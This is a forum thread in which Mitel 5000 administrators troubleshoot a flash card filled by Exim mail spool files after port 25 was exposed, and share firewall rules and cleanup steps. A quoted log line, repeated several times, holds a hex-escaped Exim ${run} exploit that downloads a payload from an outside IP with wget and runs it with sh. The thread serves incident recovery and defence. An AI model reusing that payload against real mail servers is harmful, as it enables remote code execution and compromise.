How to delete email logs through command (exim hacked)

[jluisr]

I have 1 mitel 5000 1gb flash, the system crash beacuse I don't have space inside flash (it's full). When I took a look I saw running on cli (logmgt status I got this)..

rofsutil: 5K Compact Flash: logfile status
System Log Files:         37M
CP Backup Files:          37M
CP Freeze Files:          37M
CP Database Backup:      1.4M
CP Log Files:            1.3M
Email Spool Files:       623M ***************************************
Voicemail Recordings:    376K

.For some reason the IT guy leave the port 25 opened and I look like adter the exim vulnerability was found they try to hack...From outside the port it's now blocked...but now....

https://www.zdnet.com/article/new-rce-vulnerability-impacts-nearly-half-of-the-internets-email-servers/


I appreciated any help in how to use this command (logmgt) Thanks.

[Tech Electronics]

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

[jluisr]

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

Thanks, but I just found an alternative solution, I bought CF card reader, I connect to my laptop, (linux reader partition from Windows as (Eassos) then I deleted all the files in /var/spool/exim/msglog/
You will have a couples files with weird names...inside something like this...

Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-09 23:19:05 routing failed for ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyiln\x20\x26\x26\x20sh\x20


You can delete everthing inside this folder, Also made sure that the port 25 it's block from outside.

I hope this help.....

[acejavelin]

I am curious how this happened in the first place... For this to occur, port 25/TCP would have to be open and port forwarded from the public Internet to the PBX, and this should NEVER be necessary, or the PBX has a public IP assigned directly to it (or a 1:1 NAT) and this should NEVER be acceptable.

After the issue has been corrected with space, I would definitely revisit the network setup and perform an audit of the network configuration on the system, network router, and firewall. There is absolutely no way this should occur, unless you have a malicious attack from INSIDE the LAN (and a properly setup Voice VLAN would prevent this as well).

[Tech Electronics]

acejavelin,

I don't think this was an attack at all. I have seen this issue with the mail spooler getting locked up and Mitel had to go in and clear it out.

Thanks,

TE

[jluisr]

I know that the main problem was the port forwarded to the PBX (all port including 25 was open to the world, but I had a 3 systems that they crashed the same day. After the exit vulnerability was discovered a lot ip from the internet are looking for port 25 exim running old versions...
Now they are working, all the logs are showing one ip from French...
My systems went up after I manually deleted the files from msglog.
Every device public on the internet wide open will get the same issue CF card full VM 28 alarm...
For me basically it’s a bug because if for some reason the port 25 it’s open we can crash any system, I know that we need to have best practices like vlan...etc, outside on the internet we have a lot systems wide open and nothing happen. I believe that mitel need to give a least option to delete this logs, but the best way is they need put a limit on this folders.....
Thanks.


Sent from my iPhone using Tapatalk

[Travis]

@TE

I'm not sure about his particular system but there is without a doubt a hack going around. I've been getting slammed. They modify the mail headers and send a couple million messages. I have 2 systems someone was able to compromise. They were rewriting the web server and setup spam emailing. on my 3rd bad flash and 11th hacked system.

[Travis]

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

Thanks, but I just found an alternative solution, I bought CF card reader, I connect to my laptop, (linux reader partition from Windows as (Eassos) then I deleted all the files in /var/spool/exim/msglog/
You will have a couples files with weird names...inside something like this...

Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-09 23:19:05 routing failed for ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyiln\x20\x26\x26\x20sh\x20


You can delete everthing inside this folder, Also made sure that the port 25 it's block from outside.

I hope this help.....

jluisr,

Is there any specific CF reader needed? Or any generic one will do?

Also you can block port 25 via the internal firewall on the webpage/diagnostics/firewall of the system. Be careful to not lock yourself out by accident. Make your first rule to allow all on the local network, Second rule your static IP From your office and then last the block 25 tcp for all.

After typing the first rule with seq 1 it will automatically become rule 3. rule 1/2 are auto generated by the system.

ex.

1       192.168.1.0    255.255.255.0     blank  blank  all   allow
4       24.222.2.222  255.255.255.128   blank blank all   allow
5        blank               0.0.0.0                25     25      tcp    block

[jluisr]

jluisr,

That is not something that is known by certified technicians as that definitely falls into the category of call Mitel. It looks as though your spooler is holding onto mail and this happens with Unified Messaging on some versions of the system. Usually you call into Mitel and get them in and they fix it in a few minutes by clearing out the spool.

I am not so sure that the version of Exim run on the MiVO-250 falls into the versions that are vulnerable either, 4.87 to 4.91, as Mitel doesn't keep up with the latest and greatest on that.

Sorry,

TE

Thanks, but I just found an alternative solution, I bought CF card reader, I connect to my laptop, (linux reader partition from Windows as (Eassos) then I deleted all the files in /var/spool/exim/msglog/
You will have a couples files with weird names...inside something like this...

Too many "Received" headers - suspected mail loop
*** Frozen (delivery error message)
2019-06-09 23:19:05 routing failed for ${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2eyiln\x20\x26\x26\x20sh\x20


You can delete everthing inside this folder, Also made sure that the port 25 it's block from outside.

I hope this help.....

jluisr,

Is there any specific CF reader needed? Or any generic one will do?

Also you can block port 25 via the internal firewall on the webpage/diagnostics/firewall of the system. Be careful to not lock yourself out by accident. Make your first rule to allow all on the local network, Second rule your static IP From your office and then last the block 25 tcp for all.

After typing the first rule with seq 1 it will automatically become rule 3. rule 1/2 are auto generated by the system.

ex.

1       192.168.1.0    255.255.255.0     blank  blank  all   allow
4       24.222.2.222  255.255.255.128   blank blank all   allow
5        blank               0.0.0.0                25     25      tcp    block

Travis,
I bought this one at microcenter store
https://www.microcenter.com/product/473039/usb-30-dual-slot-sd-uhs-ii---cf-memory-card-reader?ob=1
But I’m sure that you can use any CF reader!.

The system it’s now whitelisted from outside!..
BTW thanks


Sent from my iPhone using Tapatalk

[Grussell]

Is there any specific CF reader needed? Or any generic one will do?

Also you can block port 25 via the internal firewall on the webpage/diagnostics/firewall of the system. Be careful to not lock yourself out by accident. Make your first rule to allow all on the local network, Second rule your static IP From your office and then last the block 25 tcp for all.

After typing the first rule with seq 1 it will automatically become rule 3. rule 1/2 are auto generated by the system.

ex.

1       192.168.1.0    255.255.255.0     blank  blank  all   allow
4       24.222.2.222  255.255.255.128   blank blank all   allow
5        blank               0.0.0.0                25     25      tcp    block
[/quote]



Yes be very careful with this. You must specify a protocol when blocking port 25. Do not use (all) set it to TCP. When you get locked out you can no longer connect via the Ethernet port. It's serial cable and a call to Mitel support to get that opened back up.

[Travis]

Is there any specific CF reader needed? Or any generic one will do?

Also you can block port 25 via the internal firewall on the webpage/diagnostics/firewall of the system. Be careful to not lock yourself out by accident. Make your first rule to allow all on the local network, Second rule your static IP From your office and then last the block 25 tcp for all.

After typing the first rule with seq 1 it will automatically become rule 3. rule 1/2 are auto generated by the system.

ex.

1       192.168.1.0    255.255.255.0     blank  blank  all   allow
4       24.222.2.222  255.255.255.128   blank blank all   allow
5        blank               0.0.0.0                25     25      tcp    block

Yes be very careful with this. You must specify a protocol when blocking port 25. Do not use (all) set it to TCP. When you get locked out you can no longer connect via the Ethernet port. It's serial cable and a call to Mitel support to get that opened back up.
[/quote]

Grussel is correct,

You want to use caution when setting up these rules. I find its best practice to have my guys NEVER make their first rule a block. Always allow the pbx's local network, followed by your public IP (remote access public), Also any other public networks that you may need. After that then make your block rule.

On all of my systems that are being attacked I've been blocking 22,25,80,443,4000 tcp. Using netstat I can see that there are multiple connections to these ports from the attackers IP.

Resetting the IP tables via usb cable to the front of the HX isn't to complicated. Just need to make sure you have the drivers, connect via com and run the command "reset_iptables".